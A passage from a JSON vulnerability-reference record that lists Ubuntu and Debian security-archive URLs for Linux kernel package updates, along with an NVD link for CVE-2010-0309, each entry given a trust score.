        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-386_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server-bigiron_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/char-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-18-lpia_2.6.28-18.59_lpia.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-server_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-386_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-18.59_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-server_2.6.31-19.56_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc-smp_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.26_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-orion5x_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-powerpc64_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sparc64-smp_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-versatile_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mips_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-smp_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-mckinley_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-s390_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-21lenny2_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r4k-ip22_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-mckinley_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390-tape_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-5kc-malta_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-xen-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.26-2-xen-686_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-legacy_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0309"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
